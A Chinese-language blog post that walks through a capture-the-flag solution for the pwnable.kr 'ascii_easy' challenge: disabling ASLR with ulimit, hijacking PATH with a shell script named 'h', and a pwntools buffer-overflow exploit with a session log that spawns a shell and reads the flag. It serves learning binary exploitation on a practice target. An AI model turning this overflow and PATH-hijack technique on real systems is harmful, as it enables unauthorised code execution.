<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Pwnable," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="Trickulimit -s unlimited 禁用aslr
Conclusion没有做出来，不过顺便翻了《Shellcode’s Handerbook》- Chapter 9 学习了下
第二次来做，还是遇到了很多障碍，首先system的地址在计算出来后发现不是都是符合要求的字节，然后试了下execve发现可以
接下来就是找字符串，刚开始试了&amp;#39;/bin/sh\x00&amp;#39;，都不符合要">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable.kr-rookiss-ascii-easy">
<meta property="og:url" content="http://0byjwzsf.me/2016/08/11/pwnable-rookiss-ascii-easy/index.html">
<meta property="og:site_name" content="Icemakr's Blog">
<meta property="og:description" content="Trickulimit -s unlimited 禁用aslr
Conclusion没有做出来，不过顺便翻了《Shellcode’s Handerbook》- Chapter 9 学习了下
第二次来做，还是遇到了很多障碍，首先system的地址在计算出来后发现不是都是符合要求的字节，然后试了下execve发现可以
接下来就是找字符串，刚开始试了&amp;#39;/bin/sh\x00&amp;#39;，都不符合要">
<meta property="og:updated_time" content="2016-08-11T03:42:55.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwnable.kr-rookiss-ascii-easy">
<meta name="twitter:description" content="Trickulimit -s unlimited 禁用aslr
Conclusion没有做出来，不过顺便翻了《Shellcode’s Handerbook》- Chapter 9 学习了下
第二次来做，还是遇到了很多障碍，首先system的地址在计算出来后发现不是都是符合要求的字节，然后试了下execve发现可以
接下来就是找字符串，刚开始试了&amp;#39;/bin/sh\x00&amp;#39;，都不符合要">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://0byjwzsf.me/2016/08/11/pwnable-rookiss-ascii-easy/"/>

  <title> pwnable.kr-rookiss-ascii-easy | Icemakr's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?5ae83853fc19f40e51b4490ceb76aa1d";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Icemakr's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">focus your minds</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'Rp7ZqqNxwbocZekuUGSB','2.0.0');
</script>



    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                pwnable.kr-rookiss-ascii-easy
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-08-11T00:00:00+08:00" content="2016-08-11">
              2016-08-11
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/Wargames/" itemprop="url" rel="index">
                    <span itemprop="name">Wargames</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/08/11/pwnable-rookiss-ascii-easy/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2016/08/11/pwnable-rookiss-ascii-easy/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Trick">Trick</h1><p><code>ulimit -s unlimited</code> 禁用<strong>aslr</strong></p>
<h1 id="Conclusion">Conclusion</h1><p><del>没有做出来，不过顺便翻了《Shellcode’s Handerbook》- Chapter 9 学习了下</del></p>
<p>第二次来做，还是遇到了很多障碍，首先<code>system</code>的地址在计算出来后发现不是都是符合要求的字节，然后试了下<code>execve</code>发现可以</p>
<p>接下来就是找字符串，刚开始试了<code>&#39;/bin/sh\x00&#39;</code>，都不符合要求。然后又试了<code>&#39;sh\x00&#39;</code>，也不符合要求，于是我就没辙了。再次求助google(即使是第二次来做也还是没做出来，心好累:(</p>
<p>首先，<code>execlp</code>函数的原型为<code>int execlp(const char *file, const char *arg, ...);</code></p>
<p>通过<code>man execv</code>，可以看到其中有一段对<code>execlp</code>函数的解释</p>
<blockquote>
<p>The execlp(), execvp(), and execvpe() functions duplicate the  actions  of  the  shell  in<br>searching  for  an  executable file if the specified filename does not contain a slash (/)<br>character.  The file is sought in the colon-separated list of directory  pathnames  speci-<br>fied  in  the  PATH  environment  variable.  If this variable isn’t defined, the path list<br>defaults to the current directory followed by the list of directories  returned  by  conf-<br>str(_CS_PATH).  (This confstr(3) call typically returns the value “/bin:/usr/bin”.)</p>
</blockquote>
<p>假使输入的<code>filename</code>不含<code>/</code>符号，就会采取和shell寻找可执行文件一样的方式去寻找这个文件，即遍历<strong>$PATH</strong>环境变量中的路径，在每个路径下尝试寻找<code>filename</code>文件</p>
<p>因此只要将一个我们可写的路径加到PATH环境变量里，然后在这个路径下任意创建一个可以启动shell的文件，调整一个合适的文件名，使得能在内存中搜到这个文件名的字符串即可，这里选取了”h”文件名，在gdb中用<code>gdb$ find 0x5558b000,+0x1a6000,&quot;h&quot;</code>搜索该字符串，筛选符合要求的即可</p>
<h1 id="Exploit">Exploit</h1><h2 id="log">log</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">icemakr:~$ ssh ascii_easy@pwnable.kr -p2222</span><br><span class="line"></span><br><span class="line">ascii_easy@ubuntu:~$ <span class="built_in">cd</span> /tmp</span><br><span class="line">ascii_easy@ubuntu:/tmp$ mkdir icemakrrr</span><br><span class="line"></span><br><span class="line">ascii_easy@ubuntu:/tmp/icemakrrr$ cat &gt; h</span><br><span class="line"><span class="shebang">#!/bin/sh</span></span><br><span class="line">/bin/sh</span><br><span class="line">^C</span><br><span class="line"></span><br><span class="line">ascii_easy@ubuntu:/tmp/icemakrrr$ <span class="built_in">export</span> PATH=/tmp/icemakrrr:<span class="variable">$PATH</span></span><br><span class="line">ascii_easy@ubuntu:/tmp/icemakrrr$ <span class="built_in">ulimit</span> <span class="operator">-s</span> unlimited</span><br><span class="line"></span><br><span class="line">ascii_easy@ubuntu:/tmp/icemakrrr$ cat &gt; exp.py</span><br><span class="line">from pwn import *</span><br><span class="line">p = process(<span class="string">'/home/ascii_easy/ascii_easy'</span>)</span><br><span class="line"></span><br><span class="line">adr_execlp  = <span class="number">0</span>x55643970</span><br><span class="line">adr_filenm  = <span class="number">0</span>x55665c6c</span><br><span class="line"></span><br><span class="line">payload  = <span class="string">'A'</span> * <span class="number">0</span>xac</span><br><span class="line">payload += p32(adr_execlp)</span><br><span class="line">payload += <span class="string">'AAAA'</span></span><br><span class="line">payload += p32(adr_filenm)</span><br><span class="line">payload += p32(<span class="number">0</span>x0)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line">^C</span><br><span class="line"></span><br><span class="line">ascii_easy@ubuntu:/tmp/icemakrrr$ python exp.py</span><br><span class="line">[+] Starting program <span class="string">'/home/ascii_easy/ascii_easy'</span>: Done</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">Input text : triggering bug...</span><br><span class="line">$ <span class="built_in">cd</span></span><br><span class="line">$ cat flag</span><br><span class="line">damn you ascii armor... what a pain <span class="keyword">in</span> the ass!! :(</span><br><span class="line">$ <span class="built_in">exit</span></span><br></pre></td></tr></table></figure>
<h2 id="exp-py">exp.py</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">'/home/ascii_easy/ascii_easy'</span>)</span><br><span class="line"></span><br><span class="line">adr_execlp  = <span class="number">0x55643970</span> <span class="comment"># gdb$ p execlp</span></span><br><span class="line">adr_filenm  = <span class="number">0x55665c6c</span> <span class="comment"># find 0x5558b000,+0x1a6000,"h"</span></span><br><span class="line"></span><br><span class="line">payload  = <span class="string">'A'</span> * <span class="number">0xac</span></span><br><span class="line">payload += p32(adr_execlp)</span><br><span class="line">payload += <span class="string">'AAAA'</span></span><br><span class="line">payload += p32(adr_filenm)</span><br><span class="line">payload += p32(<span class="number">0x0</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="Referance">Referance</h1><p><a href="http://werew.tk/article/12/ascii_easy-pwnablekr" target="_blank" rel="external">http://werew.tk/article/12/ascii_easy-pwnablekr</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Pwnable/" rel="tag">#Pwnable</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/08/10/reversing-easy/" rel="next" title="reversing.kr-easy">
                <i class="fa fa-chevron-left"></i> reversing.kr-easy
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/08/14/pwnable-rookiss-fix/" rel="prev" title="pwnable.kr-rookiss-fix">
                pwnable.kr-rookiss-fix <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/author.jpg"
               alt="Icemakr" />
          <p class="site-author-name" itemprop="name">Icemakr</p>
          <p class="site-description motion-element" itemprop="description">Dive dive dive into Binary</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">24</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Seas0n" target="_blank" title="github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  github
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Trick"><span class="nav-number">1.</span> <span class="nav-text">Trick</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Conclusion"><span class="nav-number">2.</span> <span class="nav-text">Conclusion</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Exploit"><span class="nav-number">3.</span> <span class="nav-text">Exploit</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#log"><span class="nav-number">3.1.</span> <span class="nav-text">log</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp-py"><span class="nav-number">3.2.</span> <span class="nav-text">exp.py</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Referance"><span class="nav-number">4.</span> <span class="nav-text">Referance</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Icemakr</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  

    <script type="text/javascript">
      var disqus_shortname = '0byjwzsf';
      var disqus_identifier = '2016/08/11/pwnable-rookiss-ascii-easy/';
      var disqus_title = "pwnable.kr-rookiss-ascii-easy";
      var disqus_url = 'http://0byjwzsf.me/2016/08/11/pwnable-rookiss-ascii-easy/';

      function run_disqus_script(disqus_script){
        var dsq = document.createElement('script');
        dsq.type = 'text/javascript';
        dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/' + disqus_script;
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
      }

      run_disqus_script('count.js');
      
        run_disqus_script('embed.js');
      
    </script>
  




  
  

  

  

  

</body>
</html>
